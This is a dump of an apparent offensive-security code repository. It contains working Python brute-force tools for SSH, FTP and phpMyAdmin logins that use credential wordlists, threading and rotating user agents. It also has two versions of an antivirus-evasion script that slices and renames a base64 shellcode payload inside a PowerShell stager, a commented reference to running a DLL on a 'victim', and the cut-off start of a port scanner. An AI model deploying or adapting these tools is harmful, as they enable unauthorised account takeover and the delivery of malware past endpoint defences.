| """ 134 | parser = argparse.ArgumentParser(usage=usage, description="des") 135 | parser.add_argument("-H", "--host", type=str, dest="host", help="Hosts to scan") 136 | parser.add_argument("-if", "--ipfile", type=str, dest="ipfile", help="IP file") 137 | parser.add_argument("-p", "--port", type=int, dest="port", default=22, help="Port to scan") 138 | parser.add_argument("--user", type=str, dest="username", help="Username") 139 | parser.add_argument("--pass", type=str, dest="password", help="Password") 140 | parser.add_argument("-uf", "--userfile", type=str, default=None, dest="userfile", help="Username file") 141 | parser.add_argument("-pf", "--passfile", type=str, default=None, dest="passfile", help="Password file") 142 | parser.add_argument("-t", "--threads", type=int, default=10, dest="threads", help="Threads") 143 | parser.add_argument("--timeout", type=int, default=5, dest="timeout", help="Request timeout") 144 | args = parser.parse_args() 145 | 146 | Host = args.host 147 | Port = args.port 148 | Ipfile = args.ipfile 149 | Username = args.username 150 | Password = args.password 151 | Userfile = args.userfile 152 | Passfile = args.passfile 153 | Thread_maxnum = args.threads 154 | Timeout = args.timeout 155 | print("Bruster bot is running...") 156 | # print(Passfile) 157 | MY_QUEUE = Queue() 158 | thread_list = [] 159 | if args.timeout != 0 and args.timeout > 0: 160 | timeout = args.timeout 161 | else: 162 | print("--timeout Setting error.") 163 | exit(1) 164 | bruster_bot = Mybruster(ip=Host, ipfile=Ipfile, port=Port, queue=MY_QUEUE, username=Username, password=Password, 165 | userfile=Userfile, passfile=Passfile, timeout=Timeout) 166 | 167 | for i in range(Thread_maxnum): 168 | # 注意target参数没有(),有()会线程卡死,应该是根据名称去起线程执行函数 169 | thread = threading.Thread(target=bruster_bot.start) 170 | thread_list.append(thread) 171 | for thread in thread_list: 172 | thread.start() 173 | for thread in thread_list: 174 | thread.join() 175 | -------------------------------------------------------------------------------- /Mybruster_ftp 函数版.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | 5 | import ftplib 6 | import threading 7 | import argparse 8 | 9 | 10 | def ftpcrack(host, username, password): 11 | ftp = ftplib.FTP() 12 | try: 13 | ftp.connect(host, 21, 2) 14 | ftp.login(username, password) 15 | ftp.retrlines('LIST') 16 | ftp.quit() 17 | print("{} succeed username{} password {}".format(host, username, password)) 18 | return True 19 | except ftplib.all_errors as e: 20 | pass 21 | 22 | 23 | def main(): 24 | parser = argparse.ArgumentParser() 25 | parser.add_argument('host', help='please host you want to crack ,eg:127.0.0.1') 26 | parser.add_argument('userlist', help='userlist eag:user.txt') 27 | parser.add_argument('passlist', help='passlist eg:pass.txt') 28 | args = parser.parse_args() 29 | 30 | host = args.host 31 | 32 | userfile = args.userlist 33 | 34 | passfile = args.passlist 35 | 36 | userf = open(userfile, 'r') 37 | passf = open(passfile, 'r') 38 | for line in userf.readlines(): 39 | username = line.strip() 40 | for line in passf.readlines(): 41 | password = line.strip() 42 | t = threading.Thread(target=ftpcrack, args=(host, username, password)) 43 | t.start() 44 | 45 | 46 | if __name__ == "__main__": 47 | main() 48 | -------------------------------------------------------------------------------- /Mybruster_phpmyadmin.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | from html import unescape 4 | import random 5 | import argparse 6 | import threading 7 | import time 8 | from queue import Queue 9 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 10 | 11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 12 | 13 | ''' 14 | 15 | 对PhpMyadmin接口爆破程序,支持自定义线程,路径,字典,端口,支持https 16 | 多线程,生产者消费者模型,可以实现指定username,userfile password,passfile 自定义超时时间,线程数 17 | ''' 18 | 19 | ''' 20 | phpmyadmin 有token,所以要先访问一下页面获得token,对应字段为响应的set-cookie的phpmyadmin字段, 21 | 注意第一个为了获得token所以第一次尝试登陆的时候也要是post请求,get请求不行。 22 | 23 | 最初想法:每次发一个空包,获取token,然后再发爆破包,如果多线程爆破的话,token用一次就失效了,所以那种情况只能串行 24 | 后面改进:第一次发一个空包,username,password都为空的post包,为此session获取一个token, 25 | 然后每次爆破初始化这个session的title和token,这样就不用每爆破一次,要发两个包了。 26 | 问题: 27 | 另外,由于所有线程共用一个session,所以当有一个线程爆破进去之后,可能出现这个token是正确的, 28 | 所以可能会直接跳转进去,导致re不能匹配到指定字段,既不能不能获得token字段,使得获取list[0]时越界, 29 | 所以其他线程不知道已经爆破成功了,没有终止,匹配不到对应标签,也就获取不到指定的token字段, 30 | 所以在线程产生IndexError的时候,让他停止, 31 | 但是这样有个坏处就是,如果是因为不可达,而访问不到可能不知道是否是程序的问题。 32 | ''' 33 | 34 | 35 | class Mybruster_phpmyadmin: 36 | def __init__(self, url=None, queue=None, username=None, password=None, userfile=None, passfile=None,timeout=5): 37 | self.url = url 38 | self.queue = queue 39 | self.username = username 40 | self.password = password 41 | self.userfile = userfile 42 | self.passfile = passfile 43 | self.timeout = timeout 44 | self.session = requests.session() 45 | self.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 46 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'} 47 | self.post_data = {'pma_username': None, 'pma_password': None, "server": 1, "target": "index.php", "token": None} 48 | # 生产者 初始化执行 49 | self.title, self.token = self.get_title_and_token() 50 | self.get_data_from_file(self.username,self.password,self.userfile,self.passfile) 51 | # 生成随机UA 52 | def random_useragent(self): 53 | USER_AGENTS = [ 54 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 55 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", 56 | "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 57 | "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", 58 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)", 59 | "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)", 60 | "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)", 61 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)", 62 | "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6", 63 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1", 64 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0", 65 | "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5", 66 | "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6", 67 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", 68 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20", 69 | "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52", 70 | ] 71 | return random.choice(USER_AGENTS) 72 | 73 | # def read_data(self): 74 | # 初始化执行一次就可以了,为了获得初始token 75 | def get_title_and_token(self): 76 | res = self.session.post(url=self.url, headers=self.headers, data=self.post_data, timeout=self.timeout) 77 | title = re.findall("(.*?)", res.text) 78 | token = re.findall(r'', res.text) 79 | token = unescape(token) # html实体解码 80 | # print(title, token) 81 | return [title, token] 82 | 83 | # 获取数据传入管道 84 | def get_data_from_file(self, username=None, password=None, userfile=None, passfile=None): 85 | if userfile is not None and passfile is not None: 86 | with open(userfile, 'r') as f: 87 | with open(passfile, 'r') as g: 88 | for userline in f: 89 | for passline in g: 90 | self.queue.put((userline.strip(), passline.strip())) 91 | # print((userline.strip(), passline.strip())) 92 | elif username is not None and passfile is not None: 93 | with open(passfile, 'r') as g: 94 | for passline in g: 95 | self.queue.put((username, passline.strip())) 96 | # print((username, passline.strip())) 97 | elif username is not None and password is not None: 98 | self.queue.put((username, password)) 99 | else: 100 | print("params set error!") 101 | exit(1) 102 | 103 | def requestt(self, username, password): 104 | # res1 = self.session.post(url=self.url, headers=headers, data=self.post_data) 105 | # title1 = re.findall("(.*?)", res1.text) 106 | # token1 = re.findall(r'', res1.text)[0] 107 | # token1 = unescape(token) # html实体解码 108 | post_data = {'pma_username': username, 'pma_password': password, "server": 1, "target": "index.php", 109 | "token": self.token} 110 | # print(post_data) 111 | res2 = self.session.post(url=self.url, headers=self.headers, data=post_data, timeout=self.timeout) 112 | # print(res2.status_code) 113 | title2 = re.findall("(.*?)", res2.text) 114 | # print(res2.text) 115 | # exit(1) 116 | # time.sleep(2) 117 | # print(title2) 118 | if title2 != self.title: 119 | print("Success:", "username:", username, ',', "password:", password) 120 | self.queue.queue.clear() # 爆破成功清空队列 121 | exit(0) 122 | else: 123 | # 当有一个线程爆破成功后,好像这个session就进去了,导致匹配不到下面的字段,所以,会报列表越界,加个try强制跳过吧。 124 | try: 125 | token2 = re.findall(r'', res2.text)[0] 126 | token2 = unescape(token2) # html实体解码 127 | self.title, self.token = title2, token2 128 | except IndexError: 129 | # pass 130 | exit(1) 131 | 132 | # 多线程+ 133 | def start(self): 134 | while not self.queue.empty(): 135 | username, password = self.queue.get() 136 | self.requestt(username, password) 137 | 138 | 139 | if __name__ == '__main__': 140 | usage = """ 141 | phpmyadmin bruter By Komomon. 142 | python3 test31.py -u http://192.168.148.136:81/phpMyAdmin/index.php --user root -pf asdf.txt 143 | python3 test31.py -u http://192.168.148.136:81/phpMyAdmin/index.php --uf qwer.txt -pf asdf.txt 144 | python test31.py -u http://192.168.148.136:81/phpMyAdmin/index.php --user root -pf asdf.txt -t 50 145 | python test31.py -u http://192.168.148.136:81/phpMyAdmin/index.php --user root -pf asdf.txt --timeout 10 146 | 可以实现指定username,userfile password,passfile 自定义超时时间,线程数 147 | """ 148 | parser = argparse.ArgumentParser(usage=usage, description="") 149 | parser.add_argument("-u", "--url", type=str, default=None, dest="url", help="URL") 150 | parser.add_argument("--user", type=str, default=None, dest="username", help="Username") 151 | parser.add_argument("--pass", type=str, default=None, dest="password", help="Password") 152 | parser.add_argument("-uf", "--userfile", type=str, default=None, dest="userfile", help="Username file") 153 | parser.add_argument("-pf", "--passfile", type=str, default=None, dest="passfile", help="Password file") 154 | parser.add_argument("-t", "--threads", type=int, default=10, dest="threads", help="Threads") 155 | parser.add_argument("--timeout", type=int, default=5, dest="timeout", help="Request timeout") 156 | # parser.add_argument("--timeout", type=int, default=2, dest="timeout", help="Request timeout") 157 | args = parser.parse_args() 158 | Url = args.url 159 | Username = args.username 160 | Password = args.password 161 | Userfile = args.userfile 162 | Passfile = args.passfile 163 | Thread_maxnum = args.threads 164 | Timeout = args.timeout 165 | print("Bruster bot is running...") 166 | print("Url: %s" %Url) 167 | MY_QUEUE = Queue() 168 | thread_list = [] 169 | if args.timeout != 0 and args.timeout > 0: 170 | timeout = args.timeout 171 | else: 172 | print("--timeout Setting error.") 173 | exit(1) 174 | bruster_bot = Mybruster_phpmyadmin(url=Url, queue=MY_QUEUE,username=Username, password=Password, userfile=Userfile, passfile=Passfile, timeout=Timeout) 175 | 176 | for i in range(Thread_maxnum): 177 | # 注意target参数没有(),有()会线程卡死,应该是根据名称去起线程执行函数 178 | thread = threading.Thread(target=bruster_bot.start) 179 | thread_list.append(thread) 180 | # print(thread_list) 181 | # print(thread_list) 182 | for thread in thread_list: 183 | thread.start() 184 | for thread in thread_list: 185 | thread.join() 186 | 187 | -------------------------------------------------------------------------------- /Mybruster_phpmyadmin单线程版.py: -------------------------------------------------------------------------------- 1 | from requests import session 2 | from re import findall 3 | from html import unescape 4 | 5 | target = "http://192.168.148.136:81/phpMyAdmin/index.php" 6 | user = "root" 7 | passdic = "asdf.txt" 8 | ss = session() 9 | ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 10 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'} 11 | 12 | 13 | def get_token(text) -> str: 14 | token = findall("name=\"token\" value=\"(.*)\" />", text) 15 | return unescape(token[0]) if token else None 16 | 17 | 18 | def get_title(text) -> str: 19 | title = findall("(.*)", text) 20 | return title[0] if title else None 21 | 22 | 23 | def try_login(user, pwd, token): 24 | data = {"pma_username": user, 25 | "pma_password": pwd, 26 | "server": 1, 27 | "target": "index.php", 28 | "token": token} 29 | r = ss.post(url=target, data=data) 30 | return r.text 31 | 32 | 33 | def fuck_pma(): 34 | with open(passdic, "r", encoding="utf-8") as f: 35 | html = try_login("", "", "") 36 | title_fail = get_title(html) 37 | token = get_token(html) 38 | for line in f: 39 | pwd = line.strip() 40 | html = try_login(user, pwd, token) 41 | title = get_title(html) 42 | token = get_token(html) 43 | if title != title_fail: 44 | print(f"{user} {pwd} 登录成功 {title}") 45 | # with open("success.txt", "a", encoding="utf-8") as f: 46 | # f.write(f"{target} {user} {pwd}\n") 47 | # break 48 | else: 49 | print(f"{user} {pwd} 登陆失败 {title}") 50 | 51 | 52 | if __name__ == "__main__": 53 | try: 54 | fuck_pma() 55 | except Exception as e: 56 | print(e) 57 | -------------------------------------------------------------------------------- /MybypassAV_ps1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # author: Komomon(github) 3 | import sys 4 | import random 5 | import string 6 | import os 7 | import time 8 | import platform 9 | import argparse 10 | import re 11 | import base64 12 | 13 | 14 | ''' 15 | 目前实现,部分变量名称随机化替换 16 | payload部分转为字节数组,随机化分割,再拼接 17 | todo: 18 | 所有变量或关键词的随机化 19 | ''' 20 | 21 | # a-zA-Z 生成一个长度为8-15的字符串 22 | def get_random_string(): 23 | # With combination of lower and upper case 24 | length = random.randint(8, 15) 25 | result_str = ''.join(random.choice(string.ascii_letters) for i in range(length)) 26 | # print random string 27 | return result_str 28 | 29 | 30 | def xor(data): 31 | key = get_random_string() 32 | l = len(key) 33 | output_str = "" 34 | flag = 0 35 | for i in range(len(data)): 36 | current = data[i] 37 | current_key = key[i % len(key)] 38 | o = lambda x: x if isinstance(x, int) else ord(x) # 处理字节而不是字符串的数据 ord()函数主要用来返回对应字符的ascii码 39 | output_str += chr(o(current) ^ ord(current_key)) # 异或运算并加到一起 40 | ciphertext = "" 41 | for x in output_str: 42 | ciphertext += hex(ord(x)) + ", " 43 | flag += 1 44 | if flag == 15: 45 | ciphertext += "\n" 46 | flag = 0 47 | ciphertext = "{ " + ciphertext + "0x00};" 48 | # ciphertext = '{ ' + ', '.join(hex(ord(x)) for x in output_str) + ', 0x00};' # 16进制结果拼接到数组中,hex(ord("x"))=0x78 取后两位 49 | # print(ciphertext) 50 | # ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in output_str) + ', 0x00};' # hex(ord("x"))=0x78 取后两位 51 | # print(ciphertext) 52 | return ciphertext, key 53 | 54 | 55 | def list_random_slice(data_list): 56 | slice_num = random.randint(5, 15) 57 | result_list = [] 58 | length = len(data_list) 59 | step = length // slice_num 60 | # 排除最后会余几个的情况,毕竟上面是四舍运算 61 | if step*slice_num >=length: 62 | pass 63 | else: 64 | slice_num += 1 65 | 66 | for n in range(0, length, step): 67 | # random_num = random.randint(1, length) 68 | result_list.append(data_list[n:n+step]) 69 | # index += random_num 70 | # length = length - random_num 71 | # print(result_list) 72 | return result_list, slice_num 73 | 74 | 75 | def ps1_bypassAV(payload_file): 76 | try: 77 | # print(1) 78 | original = open(payload_file, "rt") # 读取为字节以处理字符集解析问题 79 | data = original.read() 80 | # print(2) 81 | except Exception as e: 82 | print("err:", e) 83 | print("[*] Failed to read " + payload_file + " :( [*]") 84 | print("[*] Missing " + payload_file + " in pwd? [*]") 85 | sys.exit(1) # exit if read failed 86 | # print(3) 87 | # get base64 payload 88 | payload_base64 = re.findall(r"\[System.Convert]::FromBase64String\('(.*?)'\)", data)[0] 89 | # print(payload) 90 | byte_data = bytearray(base64.b64decode(payload_base64)) 91 | # print(byte_data) 92 | byte_list = [] 93 | # payload_type_str_list = [] 94 | for i in byte_data: 95 | # baselist2.append(ord(i)) 96 | byte_list.append(i) 97 | payload_byte_list, slice_num = list_random_slice(byte_list) 98 | # print(slice_num) 99 | # print("result", result) 100 | # print(byte_list) 101 | payload_slice_names = [] 102 | payload = '' 103 | # 生成分片变量名字 104 | for i in range(slice_num): 105 | payload_slice_names.append(get_random_string()) 106 | # 生成多个payload的分片ps1 代码 107 | for sublist in payload_byte_list: 108 | # [Byte[]]$var_c1 = [Byte[]](31,42,160,68,249) 109 | # print(sublist) 110 | payload += "[Byte[]]$" + payload_slice_names[payload_byte_list.index(sublist)] +" = [Byte[]](" + ",".join(str(byte) for byte in sublist) + ")\n\t" 111 | # exit(0) 112 | # payload_name = get_random_string() 113 | payload = payload + "\n\t[Byte[]]$var_code = " + " + ".join("$"+x for x in payload_slice_names) 114 | # payload_byte_str = "(" + ",".join(str(byte) for byte in byte_list) + ")" 115 | # for byte in byte_list: 116 | # payload_byte_str += byte 117 | # print(payload) 118 | 119 | # payload = "[Byte[]]" + payload_byte_str 120 | # data = data.replace(payload_base64,) 121 | data = re.sub(r"\[Byte\[]]\$var_code = \[System.Convert]::FromBase64String\('(.*?)'\)", payload, data, 1) 122 | # payload = re.findall(r"\[System.Convert]::FromBase64String\('(.*?)'\)", data)[0] 123 | # print(data) 124 | # data = data.replace("[System.Convert]::FromBase64String", "[Byte[]]") 125 | 126 | func_fgpa_name = get_random_string() 127 | func_fgdt_name = get_random_string() 128 | var_str = get_random_string() 129 | param_x_name = get_random_string() 130 | resultps1_name = get_random_string() 131 | 132 | data = data.replace("func_get_proc_address", func_fgpa_name) 133 | data = data.replace("func_get_delegate_type", func_fgdt_name) 134 | data = data.replace("$var_", "$" + var_str) 135 | data = data.replace("$x", "$" + param_x_name) 136 | 137 | original.close() 138 | # resultps1_name = "resultps1_name" 139 | resultps1 = open(resultps1_name + ".ps1", "w+") 140 | resultps1.write(data) 141 | time.sleep(1) 142 | print("[*] " + resultps1_name + ".ps1 generated! [*]") 143 | print("[*] Usage: powershell -ExecutionPolicy bypass -File .\\" + resultps1_name + ".ps1 generated! [*]") 144 | time.sleep(1) 145 | resultps1.close() 146 | return resultps1_name + ".ps1" 147 | 148 | 149 | 150 | 151 | # ps1_bypassAV("csps64.ps1") 152 | 153 | # 154 | # def main(beaconbin_file): 155 | # # print(banner) 156 | # 157 | # time.sleep(3) 158 | # try: 159 | # print("[*] Initialising charlotte() [*]") 160 | # time.sleep(1) 161 | # e1 = charlotte(beaconbin_file) 162 | # except Exception as e: 163 | # print("EEEE:", e) 164 | # print("[*] charlotte() failed? :( [*]") 165 | # sys.exit(1) # exit if code generation failed 166 | # print("[*] Completed - Compiling " + e1 + ".dll [*]") 167 | # time.sleep(1) 168 | # if platform.system() == "Windows": 169 | # print('windows') 170 | # print('windows 自行编译') 171 | # elif platform.system() == "Linux": 172 | # print('linux') 173 | # try: 174 | # # os.system("x86_64-w64-mingw32-g++ -shared -o charlotte.dll charlotte.cpp -fpermissive >/dev/null 2>&1") 175 | # os.system("x86_64-w64-mingw32-g++ -shared -o " + e1 + ".dll " + e1 + ".cpp -fpermissive >/dev/null 2>&1") 176 | # print("[*] Cross Compile Success! [*]") 177 | # except: 178 | # print("[*] Compilation failed :( [*]") 179 | # time.sleep(1) 180 | # # print("[*] Removing charlotte.cpp... [*]") 181 | # # os.system("rm " + e1 + ".cpp") 182 | # # time.sleep(1) 183 | # 184 | # print("[*] Execute on your Windows x64 victim with: [*]") 185 | # print("[*] rundll32 " + e1 + ".dll, " + e1 + " [*]") 186 | # time.sleep(2) 187 | # print("\n") 188 | # 189 | # 190 | if __name__ == "__main__": 191 | banner = """ 192 | Miansha Ps1 Write By Komomon 193 | """ 194 | print(banner) 195 | parser = argparse.ArgumentParser(usage="", description="des") 196 | parser.add_argument("-f", "--file", type=str, dest="file", required=True, help="The powershell file") 197 | # parser.add_argument("--port", type=int, dest="port", default=22, help="ports to scan") 198 | # parser.add_argument("-t", "--timeout", type=int, default=10, dest="timeout", help="Request timeout") 199 | # parser.add_argument("-u", "--user", type=str, required=True, dest="username", help="Username") 200 | # parser.add_argument("-p", "--pass", type=str, required=True, dest="password", help="Password") 201 | args = parser.parse_args() 202 | ps1_file = args.file 203 | # ps1_bypassAV("csps64.ps1") 204 | ps1_bypassAV(ps1_file) -------------------------------------------------------------------------------- /MybypassAV_ps1初版.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # author: Komomon(github) 3 | import sys 4 | import random 5 | import string 6 | import os 7 | import time 8 | import platform 9 | import argparse 10 | import re 11 | import base64 12 | 13 | 14 | ''' 15 | 目前实现,部分变量名称随机化替换 16 | payload部分转为字节数组 17 | todo: 18 | 字节数组随机化分割,再拼接 19 | 所有变量或关键词的随机化 20 | ''' 21 | 22 | 23 | # a-zA-Z 生成一个长度为8-15的字符串 24 | def get_random_string(): 25 | # With combination of lower and upper case 26 | length = random.randint(8, 15) 27 | result_str = ''.join(random.choice(string.ascii_letters) for i in range(length)) 28 | # print random string 29 | return result_str 30 | 31 | 32 | # def get 33 | 34 | 35 | def xor(data): 36 | key = get_random_string() 37 | l = len(key) 38 | output_str = "" 39 | flag = 0 40 | for i in range(len(data)): 41 | current = data[i] 42 | current_key = key[i % len(key)] 43 | o = lambda x: x if isinstance(x, int) else ord(x) # 处理字节而不是字符串的数据 ord()函数主要用来返回对应字符的ascii码 44 | output_str += chr(o(current) ^ ord(current_key)) # 异或运算并加到一起 45 | ciphertext = "" 46 | for x in output_str: 47 | ciphertext += hex(ord(x)) + ", " 48 | flag += 1 49 | if flag == 15: 50 | ciphertext += "\n" 51 | flag = 0 52 | ciphertext = "{ " + ciphertext + "0x00};" 53 | # ciphertext = '{ ' + ', '.join(hex(ord(x)) for x in output_str) + ', 0x00};' # 16进制结果拼接到数组中,hex(ord("x"))=0x78 取后两位 54 | # print(ciphertext) 55 | # ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in output_str) + ', 0x00};' # hex(ord("x"))=0x78 取后两位 56 | # print(ciphertext) 57 | return ciphertext, key 58 | 59 | 60 | # def list_random_slice(data_list): 61 | # slice_num = random.randint(5, 10) 62 | # result_list = [] 63 | # length = len(data_list) 64 | # step = length // slice_num 65 | # 66 | # for n in range(0, length, step): 67 | # # random_num = random.randint(1, length) 68 | # result_list.append(data_list[n:n + step]) 69 | # # index += random_num 70 | # # length = length - random_num 71 | # # print(result_list) 72 | # return result_list 73 | 74 | 75 | def charlotte(payload_file): 76 | try: 77 | # print(1) 78 | original = open(payload_file, "rt") # 读取为字节以处理字符集解析问题 79 | data = original.read() 80 | # print(2) 81 | except Exception as e: 82 | print("err:", e) 83 | print("[*] Failed to read " + payload_file + " :( [*]") 84 | print("[*] Missing " + payload_file + " in pwd? [*]") 85 | sys.exit(1) # exit if read failed 86 | # print(3) 87 | # get base64 payload 88 | payload_base64 = re.findall(r"\[System.Convert]::FromBase64String\('(.*?)'\)", data)[0] 89 | # print(payload) 90 | byte_data = bytearray(base64.b64decode(payload_base64)) 91 | # print(byte_data) 92 | byte_list = [] 93 | # payload_type_str_list = [] 94 | for i in byte_data: 95 | # baselist2.append(ord(i)) 96 | byte_list.append(i) 97 | # payload_type_str_list = list_random_slice(byte_list) 98 | # print("result", result) 99 | # print(byte_list) 100 | 101 | payload_byte_str = "(" + ",".join(str(byte) for byte in byte_list) + ")" 102 | # for byte in byte_list: 103 | # payload_byte_str += byte 104 | print(payload_byte_str) 105 | payload = "[Byte[]]" + payload_byte_str 106 | # data = data.replace(payload_base64,) 107 | data = re.sub(r"\[System.Convert]::FromBase64String\('(.*?)'\)", payload, data, 1) 108 | # payload = re.findall(r"\[System.Convert]::FromBase64String\('(.*?)'\)", data)[0] 109 | # print(data) 110 | # data = data.replace("[System.Convert]::FromBase64String", "[Byte[]]") 111 | 112 | func_fgpa_name = get_random_string() 113 | func_fgdt_name = get_random_string() 114 | var_str = get_random_string() 115 | param_x_name = get_random_string() 116 | resultps1_name = get_random_string() 117 | 118 | data = data.replace("func_get_proc_address", func_fgpa_name) 119 | data = data.replace("func_get_delegate_type", func_fgdt_name) 120 | data = data.replace("$var_", "$" + var_str) 121 | data = data.replace("$x", "$" + param_x_name) 122 | 123 | original.close() 124 | resultps1_name = "resultps1_name" 125 | resultps1 = open(resultps1_name + ".ps1", "w+") 126 | resultps1.write(data) 127 | time.sleep(1) 128 | print("[*] " + resultps1_name + ".ps1 generated! [*]") 129 | time.sleep(1) 130 | resultps1.close() 131 | return resultps1_name + ".ps1" 132 | 133 | 134 | charlotte("csps64.ps1") 135 | 136 | # 137 | # def main(beaconbin_file): 138 | # # print(banner) 139 | # 140 | # time.sleep(3) 141 | # try: 142 | # print("[*] Initialising charlotte() [*]") 143 | # time.sleep(1) 144 | # e1 = charlotte(beaconbin_file) 145 | # except Exception as e: 146 | # print("EEEE:", e) 147 | # print("[*] charlotte() failed? :( [*]") 148 | # sys.exit(1) # exit if code generation failed 149 | # print("[*] Completed - Compiling " + e1 + ".dll [*]") 150 | # time.sleep(1) 151 | # if platform.system() == "Windows": 152 | # print('windows') 153 | # print('windows 自行编译') 154 | # elif platform.system() == "Linux": 155 | # print('linux') 156 | # try: 157 | # # os.system("x86_64-w64-mingw32-g++ -shared -o charlotte.dll charlotte.cpp -fpermissive >/dev/null 2>&1") 158 | # os.system("x86_64-w64-mingw32-g++ -shared -o " + e1 + ".dll " + e1 + ".cpp -fpermissive >/dev/null 2>&1") 159 | # print("[*] Cross Compile Success! [*]") 160 | # except: 161 | # print("[*] Compilation failed :( [*]") 162 | # time.sleep(1) 163 | # # print("[*] Removing charlotte.cpp... [*]") 164 | # # os.system("rm " + e1 + ".cpp") 165 | # # time.sleep(1) 166 | # 167 | # print("[*] Execute on your Windows x64 victim with: [*]") 168 | # print("[*] rundll32 " + e1 + ".dll, " + e1 + " [*]") 169 | # time.sleep(2) 170 | # print("\n") 171 | # 172 | # 173 | # if __name__ == "__main__": 174 | # banner = """ 175 | # Miansha Dll Write By Komomon 176 | # """ 177 | # print(banner) 178 | # parser = argparse.ArgumentParser(usage="", description="des") 179 | # parser.add_argument("-f", "--file", type=str, dest="file", default="beacon.bin", help="The raw file from MSF or CS") 180 | # # parser.add_argument("--port", type=int, dest="port", default=22, help="ports to scan") 181 | # # parser.add_argument("-t", "--timeout", type=int, default=10, dest="timeout", help="Request timeout") 182 | # # parser.add_argument("-u", "--user", type=str, required=True, dest="username", help="Username") 183 | # # parser.add_argument("-p", "--pass", type=str, required=True, dest="password", help="Password") 184 | # args = parser.parse_args() 185 | # Beacon_file = args.file 186 | # main(beaconbin_file=Beacon_file) 187 | -------------------------------------------------------------------------------- /Myportscan.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | from queue import Queue 4 | import time 5 | import argparse 6 | 7 | # import argparse 8 | ''' 9 | 端口探测全类封装版,管道+探测 10 | 11 | 经过不断测试,发现一个问题 12 | 通过socket 发送包,如果认为目标,不响应则认为端口是关闭的, 13 | 但是有些端口是开放的,但是端口会回应你内容, 14 | 所以,如果不设置超时 通过s.recv(1024)会一直无响应,程序中断不了,一直在那卡着 15 | 16 | 默认不打印关闭端口信息 17 | ''' 18 | 19 | 20 | class Myportscan: 21 | def __init__(self, ips=None, ports=None, queue=None, timeout=2): 22 | self.ips = ips 23 | self.ports = ports 24 | self.queue = queue 25 | self.timeout = timeout 26 | socket.setdefaulttimeout(timeout) 27 | 28 | def get_port(self): 29 | # 80 - 100, 3380 - 3390 30 | port_list = [] 31 | port_segments = self.ports.split(',') 32 | for port_segment in port_segments: 33 | if '-' in port_segment: 34 | start, end = port_segment.split('-') 35 | for i in range(int(start), int(end) + 1): 36 | port_list.append(i) 37 | else: 38 | port_list.append(port_segment) 39 | 40 | return port_list 41 | 42 | def get_ip(self): 43 | # 10.10.10.10/24 10.10.10.10-20 10.10.10.10 10.10.10.11 44 | ips = self.ips 45 | ip_list = [] 46 | if '/' in self.ips: 47 | # 192.168.1.1/24 48 | ip_csection = self.ips.rsplit('.', 1)[0] 49 | # 将需要 ping 的 ip 加入队列 50 | for i in range(1, 256): 51 | ip_list.append(i) 52 | elif '-' in self.ips: 53 | # 192.168.1.2-10 54 | start_ip = self.ips.rsplit('-', 1) 55 | ip_csection, start = start_ip[0].rsplit('.', 1) 56 | end = int(start_ip[1]) + 1 57 | for i in range(int(start), end): 58 | ip_list.append(i) 59 | else: 60 | ip_list.append(self.ips) 61 | return ip_list 62 | 63 | def queue_put(self): 64 | ip_list = self.get_ip() 65 | port_list = self.get_port() 66 | for ip in ip_list: 67 | for port in port_list: 68 | self.queue.put((ip, port)) 69 | 70 | def 